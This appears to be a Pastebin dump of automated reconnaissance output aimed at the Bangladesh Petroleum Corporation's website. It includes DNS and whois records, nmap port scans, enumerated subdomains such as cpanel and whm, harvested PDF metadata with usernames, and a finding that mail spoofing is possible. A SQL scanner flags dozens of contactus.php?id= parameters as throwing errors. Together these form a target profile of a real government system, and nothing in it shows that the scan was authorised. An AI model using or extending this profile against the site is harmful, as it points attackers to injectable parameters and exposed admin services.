Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ######################################################################################################################################
- Hostname www.bpc.gov.bd ISP TierPoint, LLC
- Continent North America Flag
- US
- Country United States Country Code US
- Region Unknown Local time 22 Nov 2018 11:03 CST
- City Unknown Postal Code Unknown
- IP Address 173.237.136.21 Latitude 37.751
- Longitude -97.822
- #######################################################################################################################################
- > www.bpc.gov.bd
- Server: 194.187.251.67
- Address: 194.187.251.67#53
- Non-authoritative answer:
- www.bpc.gov.bd canonical name = bpc.gov.bd.
- Name: bpc.gov.bd####
- Address: 173.237.136.21
- #######################################################################################################################################
- HostIP:173.237.136.21
- HostName:www.bpc.gov.bd
- Gathered Inet-whois information for 173.237.136.21
- --------------------------------------------------------------------------------------------------------------------------------------
- inetnum: 173.234.136.0 - 173.244.143.255
- netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
- descr: IPv4 address block not managed by the RIPE NCC
- remarks: ------------------------------------------------------
- remarks:
- remarks: You can find the whois server to query, or the
- remarks: IANA registry to query on this web page:
- remarks: http://www.iana.org/assignments/ipv4-address-space
- remarks:
- remarks: You can access databases of other RIRs at:
- remarks:
- remarks: AFRINIC (Africa)
- remarks: http://www.afrinic.net/ whois.afrinic.net
- remarks:
- remarks: APNIC (Asia Pacific)
- remarks: http://www.apnic.net/ whois.apnic.net
- remarks:
- remarks: ARIN (Northern America)
- remarks: http://www.arin.net/ whois.arin.net
- remarks:
- remarks: LACNIC (Latin America and the Carribean)
- remarks: http://www.lacnic.net/ whois.lacnic.net
- remarks:
- remarks: IANA IPV4 Recovered Address Space
- remarks: http://www.iana.org/assignments/ipv4-recovered-address-space/ipv4-recovered-address-space.xhtml
- remarks:
- remarks: ------------------------------------------------------
- country: EU # Country is really world wide
- admin-c: IANA1-RIPE
- tech-c: IANA1-RIPE
- status: ALLOCATED UNSPECIFIED
- mnt-by: RIPE-NCC-HM-MNT
- mnt-lower: RIPE-NCC-HM-MNT
- created: 2018-07-09T15:19:05Z
- last-modified: 2018-09-04T13:35:20Z
- source: RIPE
- role: Internet Assigned Numbers Authority
- address: see http://www.iana.org.
- admin-c: IANA1-RIPE
- tech-c: IANA1-RIPE
- nic-hdl: IANA1-RIPE
- remarks: For more information on IANA services
- remarks: go to IANA web site at http://www.iana.org.
- mnt-by: RIPE-NCC-MNT
- created: 1970-01-01T00:00:00Z
- last-modified: 2001-09-22T09:31:27Z
- source: RIPE # Filtered
- % This query was served by the RIPE Database Query Service version 1.92.6 (WAGYU)
- Gathered Inic-whois information for bpc.gov.bd
- --------------------------------------------------------------------------------------------------------------------------------------
- Error: Unable to connect - Invalid Host
- ERROR: Connection to InicWhois Server bd.whois-servers.net failed
- close error
- Gathered Netcraft information for www.bpc.gov.bd
- --------------------------------------------------------------------------------------------------------------------------------------
- Retrieving Netcraft.com information for www.bpc.gov.bd
- Netcraft.com Information gathered
- Gathered Subdomain information for bpc.gov.bd
- -------------------------------------------------------------------------------------------------------------------------------------
- Searching Google.com:80...
- HostName:www.bpc.gov.bd
- HostIP:173.237.136.21
- Searching Altavista.com:80...
- Found 1 possible subdomain(s) for host bpc.gov.bd, Searched 0 pages containing 0 results
- Gathered E-Mail information for bpc.gov.bd
- -----------------------------------------------------------------------------------------------------------------------------------
- Searching Google.com:80...
- Searching Altavista.com:80...
- Found 0 E-Mail(s) for host bpc.gov.bd, Searched 0 pages containing 0 results
- Gathered TCP Port information for 173.237.136.21
- --------------------------------------------------------------------------------------------------------------------------------------
- Port State
- 21/tcp open
- 22/tcp open
- 26/tcp open
- 53/tcp open
- 80/tcp open
- 110/tcp open
- 143/tcp open
- Portscan Finished: Scanned 150 ports, 141 ports were in state closed
- #######################################################################################################################################
- [i] Scanning Site: http://www.bpc.gov.bd
- B A S I C I N F O
- =======================================================================================================================================
- [+] Site Title: Bangladesh Petroleum Corporation
- [+] IP address: 173.237.136.21
- [+] Web Server: Could Not Detect
- [+] CMS: Could Not Detect
- [+] Cloudflare: Not Detected
- [+] Robots File: Could NOT Find robots.txt!
- G E O I P L O O K U P
- =======================================================================================================================================
- [i] IP Address: 173.237.136.21
- [i] Country: US
- [i] State: Missouri
- [i] City: Saint Louis
- [i] Latitude: 38.614300
- [i] Longitude: -90.444397
- H T T P H E A D E R S
- =======================================================================================================================================
- [i] HTTP/1.1 200 OK
- [i] Date: Thu, 22 Nov 2018 17:10:26 GMT
- [i] Content-Type: text/html; charset=UTF-8
- [i] Connection: close
- D N S L O O K U P
- =======================================================================================================================================
- bpc.gov.bd. 21599 IN SOA ns1.speedydns.net. root.uscentral22.myserverhosts.com. 2018070501 86400 7200 3600000 86400
- bpc.gov.bd. 21599 IN A 173.237.136.21
- bpc.gov.bd. 21599 IN MX 0 bpc.gov.bd.
- bpc.gov.bd. 21599 IN NS ns1.speedydns.net.
- bpc.gov.bd. 21599 IN NS ns2.speedydns.net.
- S U B N E T C A L C U L A T I O N
- ======================================================================================================================================
- Address = 173.237.136.21
- Network = 173.237.136.21 / 32
- Netmask = 255.255.255.255
- Broadcast = not needed on Point-to-Point links
- Wildcard Mask = 0.0.0.0
- Hosts Bits = 0
- Max. Hosts = 1 (2^0 - 0)
- Host Range = { 173.237.136.21 - 173.237.136.21 }
- N M A P P O R T S C A N
- ======================================================================================================================================
- Starting Nmap 7.40 ( https://nmap.org ) at 2018-11-22 17:10 UTC
- Nmap scan report for bpc.gov.bd (173.237.136.21)
- Host is up (0.038s latency).
- rDNS record for 173.237.136.21: uscentral22.myserverhosts.com
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 23/tcp filtered telnet
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 3389/tcp closed ms-wbt-server
- Nmap done: 1 IP address (1 host up) scanned in 2.95 seconds
- S Q L V U L N E R A B I L I T Y S C A N N E R
- =======================================================================================================================================
- [#] contactus.php?id=32
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=1
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=3
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=5
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=6
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=7
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=8
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=14
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=23
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=32
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=40
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=4
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=35
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=17
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=18
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=19
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=20
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=21
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=36
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=37
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=52
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=45
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=46
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=47
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=48
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=49
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=2
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=12
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=22
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=27
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=28
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=29
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=39
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=41
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=13
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=26
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=18
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=36
- [-] Searching For SQL Errors: Found!
- [#] contactus.php?id=37
- [-] Searching For SQL Errors: Found!
- #######################################################################################################################################
- [?] Enter the target: http://www.bpc.gov.bd/
- [!] IP Address : 173.237.136.21
- [!] www.bpc.gov.bd doesn't seem to use a CMS
- [+] Honeypot Probabilty: 30%
- ---------------------------------------------------------------------------------------------------------------------------------------
- [~] Trying to gather whois information for www.bpc.gov.bd
- [+] Whois information found
- [-] Unable to build response, visit https://who.is/whois/www.bpc.gov.bd
- -------------------------------------------------------------------------------------------------------------------------------------
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 23/tcp filtered telnet
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 3389/tcp closed ms-wbt-server
- Nmap done: 1 IP address (1 host up) scanned in 1.25 seconds
- --------------------------------------------------------------------------------------------------------------------------------------
- [+] DNS Records
- ns1.speedydns.net. (174.37.183.108) AS36351 SoftLayer Technologies Inc. United States
- ns2.speedydns.net. (50.22.35.226) AS36351 SoftLayer Technologies Inc. United States
- [+] MX Records
- 0 (173.237.136.21) AS36024 Colo4, LLC United States
- [+] Host Records (A)
- www.bpc.gov.bdHTTP: (uscentral22.myserverhosts.com) (173.237.136.21) AS36024 Colo4, LLC United States
- [+] TXT Records
- [+] DNS Map: https://dnsdumpster.com/static/map/bpc.gov.bd.png
- [>] Initiating 3 intel modules
- [>] Loading Alpha module (1/3)
- [>] Beta module deployed (2/3)
- [>] Gamma module initiated (3/3)
- [+] Emails found:
- -------------------------------------------------------------------------------------------------------------------------------------
- pixel-1542906651361929-web-@www.bpc.gov.bd
- pixel-1542906653819235-web-@www.bpc.gov.bd
- No hosts found
- [+] Virtual hosts:
- --------------------------------------------------------------------------------------------------------------------------------------
- [~] Crawling the target for fuzzable URLs
- [+] Found 39 fuzzable URLs
- http://www.bpc.gov.bd//contactus.php?id=32
- [~] Using SQLMap api to check for SQL injection vulnerabilities. Don't worry we are using an online service and it doesn't depend on your internet connection. This scan will take 2-3 minutes.
- #######################################################################################################################################
- [+] Hosting Info for Website: www.bpc.gov.bd
- [+] Visitors per day: 2,360
- [+] IP Address: 173.237.136.21
- [+] IP Reverse DNS (Host): uscentral22.myserverhosts.com
- [+] Hosting IP Range: 173.237.128.0 - 173.237.191.255 (16,384 ip)
- [+] Hosting Address: 12444 Powerscourt Drive Suite 450, St. Louis, MO, 63131, US
- [+] Hosting Country: USA
- [+] Hosting Phone: +1-484-893-1507, +1-609-220-0322, +1-610-994-3046
- [+] Hosting Website: api.jumis.com
- [+] CIDR: 173.237.128.0/18
- [+] Hosting CIDR: 173.237.128.0/18
- [+] NS: bpc.gov.bd
- [+] NS: ns2.speedydns.net
- [+] NS: ns1.speedydns.net
- ######################################################################################################################################
- ; <<>> DiG 9.11.5-1-Debian <<>> bpc.gov.bd
- ;; global options: +cmd
- ;; Got answer:
- ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 36802
- ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
- ;; OPT PSEUDOSECTION:
- ; EDNS: version: 0, flags:; udp: 4096
- ;; QUESTION SECTION:
- ;bpc.gov.bd. IN A
- ;; ANSWER SECTION:
- bpc.gov.bd. 84833 IN A 173.237.136.21
- ;; Query time: 120 msec
- ;; SERVER: 194.187.251.67#53(194.187.251.67)
- ;; WHEN: jeu nov 22 12:29:33 EST 2018
- ;; MSG SIZE rcvd: 55
- #####################################################################################################################################
- ; <<>> DiG 9.11.5-1-Debian <<>> +trace bpc.gov.bd
- ;; global options: +cmd
- . 86160 IN NS h.root-servers.net.
- . 86160 IN NS c.root-servers.net.
- . 86160 IN NS l.root-servers.net.
- . 86160 IN NS g.root-servers.net.
- . 86160 IN NS m.root-servers.net.
- . 86160 IN NS b.root-servers.net.
- . 86160 IN NS e.root-servers.net.
- . 86160 IN NS i.root-servers.net.
- . 86160 IN NS k.root-servers.net.
- . 86160 IN NS a.root-servers.net.
- . 86160 IN NS d.root-servers.net.
- . 86160 IN NS f.root-servers.net.
- . 86160 IN NS j.root-servers.net.
- . 86160 IN RRSIG NS 8 0 518400 20181205050000 20181122040000 2134 . GbKyyBgbCU9fsYw/7uunYdGXnGc/GkWD7cWhP2+DSip0Tz3Vy+JJ79NZ ml0SGP0/S4GlCXVm11FpcXQOPTpoJZdtJqb/403hlOwB5q9CEooFek5d cWhmFYrkAML8E48uU1+ji72NRCdzs9saOPGk/FRlc4dTQwVNI97qqJMT GnHK9wqugnfiV4jFnAX/UmikW1tOdRyeTaqB5voY1Tku7x8XvLsu/5VL 4SOobgjvdbaLTgJqZTjLq0Q1fNMztDU3cr3I1NNWkcKSUOiAJ8tThR4s almON2rxSXGYyhwlbLezIsBj3RDEfYuc6V2TRRuSbv/fGE75rZBFYyc4 wZWwyw==
- ;; Received 525 bytes from 194.187.251.67#53(194.187.251.67) in 120 ms
- bd. 172800 IN NS jamuna.btcl.net.bd.
- bd. 172800 IN NS dns.bd.
- bd. 172800 IN NS surma.btcl.net.bd.
- bd. 172800 IN NS bd-ns.anycast.pch.net.
- bd. 86400 IN NSEC be. NS RRSIG NSEC
- bd. 86400 IN RRSIG NSEC 8 1 86400 20181205050000 20181122040000 2134 . Cee16WQpXm9zmIh4pKmOHxD7UY+0gLgYXlQx87XivrpYpTRMb3xaKc8A 98iY4jtO5j30dyLZkpR8loCWgw6un4F8MhfZLloTARKxc+EU19tUcEWO N/qgTta/lsOjDPG12VQByhlKXsPaKWDfK6zUMQbiEr+ivZxhp/gv98vJ z+F5z9+WIm6ss9x45a6XDOj9eIndlyNSkiBUcII3YsK65do3dLw1oW4v WvrkOBD5cRcyUSOUm1JNSdAdrAfCCv6A4Ovd8D151QfEzrieGXyaNHJT zM5lGpqnaV6S1xaqwv/rW8n+RJCyBb1MAxjqh9btPjRPZt+bHBjuR6mG naBlrA==
- ;; Received 657 bytes from 199.9.14.201#53(b.root-servers.net) in 280 ms
- bpc.gov.bd. 86400 IN NS ns2.speedydns.net.
- bpc.gov.bd. 86400 IN NS ns1.speedydns.net.
- ;; Received 88 bytes from 204.61.216.108#53(bd-ns.anycast.pch.net) in 117 ms
- ;; expected opt record in response
- bpc.gov.bd. 86400 IN A 173.237.136.21
- bpc.gov.bd. 86400 IN NS ns1.speedydns.net.
- bpc.gov.bd. 86400 IN NS ns2.speedydns.net.
- ;; Received 125 bytes from 174.37.183.108#53(ns1.speedydns.net) in 247 ms
- ######################################################################################################################################
- [*] Performing General Enumeration of Domain: bpc.gov.bd
- [-] DNSSEC is not configured for bpc.gov.bd
- [*] SOA ns1.speedydns.net 174.37.183.108
- [*] NS ns2.speedydns.net 50.22.35.226
- [*] NS ns1.speedydns.net 174.37.183.108
- [*] MX bpc.gov.bd 173.237.136.21
- [*] A bpc.gov.bd 173.237.136.21
- [*] Enumerating SRV Records
- [-] No SRV Records Found for bpc.gov.bd
- [+] 0 Records Found
- ######################################################################################################################################
- [*] Processing domain bpc.gov.bd
- [+] Getting nameservers
- 50.22.35.226 - ns2.speedydns.net
- 174.37.183.108 - ns1.speedydns.net
- [-] Zone transfer failed
- [+] MX records found, added to target list
- 0 bpc.gov.bd.
- [*] Scanning bpc.gov.bd for A records
- 173.237.136.21 - bpc.gov.bd
- 173.237.136.21 - autodiscover.bpc.gov.bd
- 173.237.136.21 - autoconfig.bpc.gov.bd
- 173.237.136.21 - cpanel.bpc.gov.bd
- 173.237.136.21 - ftp.bpc.gov.bd
- 127.0.0.1 - localhost.bpc.gov.bd
- 173.237.136.21 - mail.bpc.gov.bd
- 173.237.136.21 - webdisk.bpc.gov.bd
- 173.237.136.21 - webmail.bpc.gov.bd
- 173.237.136.21 - whm.bpc.gov.bd
- 173.237.136.21 - www.bpc.gov.bd
- #######################################################################################################################################
- Ip Address Status Type Domain Name Server
- ---------- ------ ---- ----------- ------
- 173.237.136.21 200 host ftp.bpc.gov.bd
- 127.0.0.1 host localhost.bpc.gov.bd
- 173.237.136.21 200 alias mail.bpc.gov.bd
- 173.237.136.21 200 host bpc.gov.bd
- 173.237.136.21 301 host webmail.bpc.gov.bd
- 173.237.136.21 200 alias www.bpc.gov.bd
- 173.237.136.21 200 host bpc.gov.bd
- ######################################################################################################################################
- [+] Testing domain
- www.bpc.gov.bd 173.237.136.21
- [+] Dns resolving
- Domain name Ip address Name server
- bpc.gov.bd 173.237.136.21 uscentral22.myserverhosts.com
- Found 1 host(s) for bpc.gov.bd
- [+] Testing wildcard
- Ok, no wildcard found.
- [+] Scanning for subdomain on bpc.gov.bd
- [!] Wordlist not specified. I scannig with my internal wordlist...
- Estimated time about 127.6 seconds
- Subdomain Ip address Name server
- ftp.bpc.gov.bd 173.237.136.21 uscentral22.myserverhosts.com
- localhost.bpc.gov.bd 127.0.0.1 localhost
- mail.bpc.gov.bd 173.237.136.21 uscentral22.myserverhosts.com
- webmail.bpc.gov.bd 173.237.136.21 uscentral22.myserverhosts.com
- www.bpc.gov.bd 173.237.136.21 uscentral22.myserverhosts.com
- #######################################################################################################################################
- Start: 2018-11-22T17:28:48+0000
- HOST: web01 Loss% Snt Last Avg Best Wrst StDev
- 1.|-- 45.79.12.202 0.0% 3 1.1 0.8 0.7 1.1 0.2
- 2.|-- 45.79.12.6 0.0% 3 1.0 3.6 0.7 9.2 4.8
- 3.|-- dls-b22-link.telia.net 0.0% 3 0.9 1.0 0.9 1.3 0.2
- 4.|-- dls-b21-link.telia.net 0.0% 3 1.4 3.4 1.4 6.3 2.6
- 5.|-- tierpoint-ic-310923-dls-b21.c.telia.net 0.0% 3 1.4 5.8 1.4 14.4 7.4
- 6.|-- 207.210.229.6 0.0% 3 1.7 1.7 1.7 1.8 0.0
- 7.|-- 174.136.31.218 0.0% 3 1.3 1.4 1.3 1.4 0.1
- 8.|-- uscentral22.myserverhosts.com 0.0% 3 1.4 1.6 1.4 1.8 0.2
- #######################################################################################################################################
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Target IP: 173.237.136.21
- + Target Hostname: www.bpc.gov.bd
- + Target Port: 80
- + Start Time: 2018-11-22 12:08:57 (GMT-5)
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Server: No banner retrieved
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_URL 0
- + ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
- + Scan terminated: 13 error(s) and 4 item(s) reported on remote host
- + End Time: 2018-11-22 13:05:53 (GMT-5) (3416 seconds)
- ---------------------------------------------------------------------------------------------------------------------------------------
- ######################################################################################################################################
- dnsenum VERSION:1.2.4
- ----- www.bpc.gov.bd -----
- Host's addresses:
- __________________
- bpc.gov.bd. 86400 IN A 173.237.136.21
- Name Servers:
- ______________
- ns2.speedydns.net. 86081 IN A 50.22.35.226
- ns1.speedydns.net. 86065 IN A 174.37.183.108
- Mail (MX) Servers:
- ___________________
- bpc.gov.bd. 86400 IN A 173.237.136.21
- Trying Zone Transfers and getting Bind Versions:
- _________________________________________________
- Trying Zone Transfer for www.bpc.gov.bd on ns2.speedydns.net ...
- Trying Zone Transfer for www.bpc.gov.bd on ns1.speedydns.net ...
- brute force file not specified, bay.
- #######################################################################################################################################
- ---------------------------------------------------------------------------------------------------------------------------------------
- [1/25] /webhp?hl=en-FR
- [x] Error downloading /webhp?hl=en-FR
- [2/25] http://www.bpc.gov.bd/admin/current_vacancies/b684c889e14c1df86dd830a9fd904cdd.pdf
- [x] Error in PDF metadata Creator
- [3/25] http://www.bpc.gov.bd/admin/notice/12fd8e6bc2cf87cca46f19a3e7b9a611.pdf
- [x] Error in the parsing process
- [4/25] http://www.bpc.gov.bd/admin/news/c1b73506b57f8ebf2928f704827dd5c1.pdf
- [5/25] http://www.bpc.gov.bd/admin/news/0f0d9138a5e0898c496fa98006f712d6.pdf
- [6/25] http://www.bpc.gov.bd/admin/news/685281be8984823884192e42eea1d05b.pdf
- [7/25] http://www.bpc.gov.bd/admin/news/f952301b036b57834b7ee3a2de020472.pdf
- [8/25] http://www.bpc.gov.bd/admin/annual_report/5878e46e61726e85a43b91e477ebeadf.pdf
- [x] Error in PDF metadata Creator
- [9/25] http://www.bpc.gov.bd/admin/annual_report/50f12271ac13cec7515303ea83553f03.pdf
- [x] Error in PDF metadata Creator
- [10/25] http://www.bpc.gov.bd/admin/annual_report/a70881d948e78e700e8581525b36c72e.pdf
- [x] Error in PDF metadata Creator
- [11/25] http://www.bpc.gov.bd/admin/notice/4eabe0863aa66c8b75c50512ce82e19f.pdf
- [x] Error in PDF metadata Creator
- [12/25] http://www.bpc.gov.bd/admin/news/d455f1c285096b6258557e06533c075c.pdf
- [13/25] https://www.bpc.gov.bd/admin/annual_performance_agreement/5ee366afaf58b1fefc13bb66c661f311.pdf
- [x] Error downloading https://www.bpc.gov.bd/admin/annual_performance_agreement/5ee366afaf58b1fefc13bb66c661f311.pdf
- [14/25] http://www.bpc.gov.bd/admin/notice/dc7b13b25ad04c58c5f8c9ee7b636ce2.pdf
- [x] Error in the parsing process
- [15/25] http://www.bpc.gov.bd/admin/annual_performance_agreement/890199e67b62b98b41ec178498f3fc50.pdf
- [x] Error in PDF metadata Creator
- [16/25] http://www.bpc.gov.bd/admin/notice/1e0e387a348b442c5b7526aabdd7ce81.pdf
- [x] Error in the parsing process
- [17/25] http://www.bpc.gov.bd/admin/notice/dbef95d4ba79e5a67d69995e72d5a3ff.pdf
- [x] Error in the parsing process
- [18/25] http://www.bpc.gov.bd/admin/news/b7807166e10bff066ade14a348b34eb8.pdf
- [19/25] http://www.bpc.gov.bd/admin/notice/28ee5a0e6338c34c25fcd818bec1895b.pdf
- [x] Error in the parsing process
- [20/25] http://www.bpc.gov.bd/admin/news/8d3e9ece7700392e11a588c85d14fd46.pdf
- [21/25] http://www.bpc.gov.bd/admin/notice/553a692d84b865b3f8d6c87a7579dc8f.pdf
- [x] Error in the parsing process
- [22/25] http://www.bpc.gov.bd/admin/notice/383e04897c6786078e0d34677956f3e0.pdf
- [x] Error in the parsing process
- [23/25] http://www.bpc.gov.bd/admin/vacancy/7cff6f9ef50bc77b13a761d6c642c5ba.pdf
- [24/25] http://www.bpc.gov.bd/admin/annual_performance_agreement/f05a92ce7e1091227bd945ff36175103.pdf
- [x] Error in PDF metadata Creator
- [25/25] http://www.bpc.gov.bd/admin/current_vacancies/99abe678b4ebe6abddbdb7f9fb75fe4a.pdf
- ######################################################################################################################################
- [+] List of users found:
- ---------------------------------------------------------------------------------------------------------------------------------------
- ��USER
- DELL
- [+] List of software found:
- -----------------------------
- GPL Ghostscript 9.14
- PDF24 Creator
- IJ Scan Utility
- Canon SC1011
- Adobe PDF Library 5.0.5
- HP PDF Formatter version 7.0.0.175
- ��DPE Build 5656
- GPL Ghostscript 9.22
- PDF Splitter and Merger (http://www.pdfarea.com)
- [+] List of e-mails found:
- ----------------------------
- cl@Ifr
- f@a
- rqtfterstg@sqm
- .r@r
- ######################################################################################################################################
- Running Source: Ask
- Running Source: Archive.is
- Running Source: Baidu
- Running Source: Bing
- Running Source: CertDB
- Running Source: CertificateTransparency
- Running Source: Certspotter
- Running Source: Commoncrawl
- Running Source: Crt.sh
- Running Source: Dnsdb
- Running Source: DNSDumpster
- Running Source: DNSTable
- Running Source: Dogpile
- Running Source: Exalead
- Running Source: Findsubdomains
- Running Source: Googleter
- Running Source: Hackertarget
- Running Source: Ipv4Info
- Running Source: PTRArchive
- Running Source: Sitedossier
- Running Source: Threatcrowd
- Running Source: ThreatMiner
- Running Source: WaybackArchive
- Running Source: Yahoo
- Running enumeration on www.bpc.gov.bd
- dnsdb: Unexpected return status 503
- waybackarchive: Get https://web.archive.org/cdx/search/cdx?url=*.www.bpc.gov.bd/*&output=json&fl=original&collapse=urlkey&page=: net/http: invalid header field value "http://web.archive.org/cdx/search/cdx?url=*.www.bpc.gov.bd/*&output=json&fl=original&collapse=urlkey&page=\x00" for key Referer
- Starting Bruteforcing of www.bpc.gov.bd with 9985 words
- Total 1 Unique subdomains found for www.bpc.gov.bd
- .www.bpc.gov.bd
- #######################################################################################################################################
- [+] www.bpc.gov.bd has no SPF record!
- [*] No DMARC record found. Looking for organizational record
- [+] No organizational DMARC record
- [+] Spoofing possible for www.bpc.gov.bd!
- #######################################################################################################################################
- __
- ____ _____ ___ ______ _/ /_____ ____ ___
- / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
- / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
- \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
- /_/ discover v0.5.0 - by @michenriksen
- Identifying nameservers for www.bpc.gov.bd... Done
- Using nameservers:
- - 50.22.35.226
- - 174.37.183.108
- Checking for wildcard DNS... Done
- Running collector: Threat Crowd... Done (0 hosts)
- Running collector: DNSDB... Error
- -> DNSDB returned unexpected response code: 503
- Running collector: Netcraft... Done (0 hosts)
- Running collector: PublicWWW... Done (0 hosts)
- Running collector: Censys... Skipped
- -> Key 'censys_secret' has not been set
- Running collector: Wayback Machine... Done (5 hosts)
- Running collector: PTRArchive... Error
- -> PTRArchive returned unexpected response code: 502
- Running collector: PassiveTotal... Skipped
- -> Key 'passivetotal_key' has not been set
- Running collector: Shodan... Skipped
- -> Key 'shodan' has not been set
- Running collector: Riddler... Skipped
- -> Key 'riddler_username' has not been set
- Running collector: VirusTotal... Skipped
- -> Key 'virustotal' has not been set
- Running collector: Dictionary... Done (0 hosts)
- Running collector: HackerTarget... Done (1 host)
- Running collector: Google Transparency Report... Done (0 hosts)
- Running collector: Certificate Search... Done (0 hosts)
- Resolving 5 unique hosts...
- 173.237.136.21 bpc.gov.bd
- 173.237.136.21 cpanel.bpc.gov.bd
- 173.237.136.21 mail.bpc.gov.bd
- 173.237.136.21 webmail.bpc.gov.bd
- 173.237.136.21 www.bpc.gov.bd
- Found subnets:
- - 173.237.136.0-255 : 5 hosts
- Wrote 5 hosts to:
- - file:///root/aquatone/www.bpc.gov.bd/hosts.txt
- - file:///root/aquatone/www.bpc.gov.bd/hosts.json
- __
- ____ _____ ___ ______ _/ /_____ ____ ___
- / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
- / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
- \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
- /_/ takeover v0.5.0 - by @michenriksen
- Loaded 5 hosts from /root/aquatone/www.bpc.gov.bd/hosts.json
- Loaded 25 domain takeover detectors
- Identifying nameservers for www.bpc.gov.bd... Done
- Using nameservers:
- - 50.22.35.226
- - 174.37.183.108
- Checking hosts for domain takeover vulnerabilities...
- Finished checking hosts:
- - Vulnerable : 0
- - Not Vulnerable : 5
- Wrote 0 potential subdomain takeovers to:
- - file:///root/aquatone/www.bpc.gov.bd/takeovers.json
- __
- ____ _____ ___ ______ _/ /_____ ____ ___
- / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
- / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
- \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
- /_/ scan v0.5.0 - by @michenriksen
- Loaded 5 hosts from /root/aquatone/www.bpc.gov.bd/hosts.json
- Probing 2 ports...
- 80/tcp 173.237.136.21 www.bpc.gov.bd, webmail.bpc.gov.bd, cpanel.bpc.gov.bd and 2 more
- 443/tcp 173.237.136.21 www.bpc.gov.bd, cpanel.bpc.gov.bd, mail.bpc.gov.bd and 2 more
- Wrote open ports to file:///root/aquatone/www.bpc.gov.bd/open_ports.txt
- Wrote URLs to file:///root/aquatone/www.bpc.gov.bd/urls.txt
- __
- ____ _____ ___ ______ _/ /_____ ____ ___
- / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
- / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
- \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
- /_/ gather v0.5.0 - by @michenriksen
- Processing 10 pages...
- Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
- Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
- Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
- Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
- Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
- Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
- Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
- Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
- Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
- Incompatability Error: Nightmarejs must be run on a system with a graphical desktop session (X11)
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-23 00:07 EST
- Nmap scan report for www.bpc.gov.bd (173.237.136.21)
- Host is up (0.22s latency).
- Not shown: 459 closed ports, 3 filtered ports
- Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 53/tcp open domain
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 465/tcp open smtps
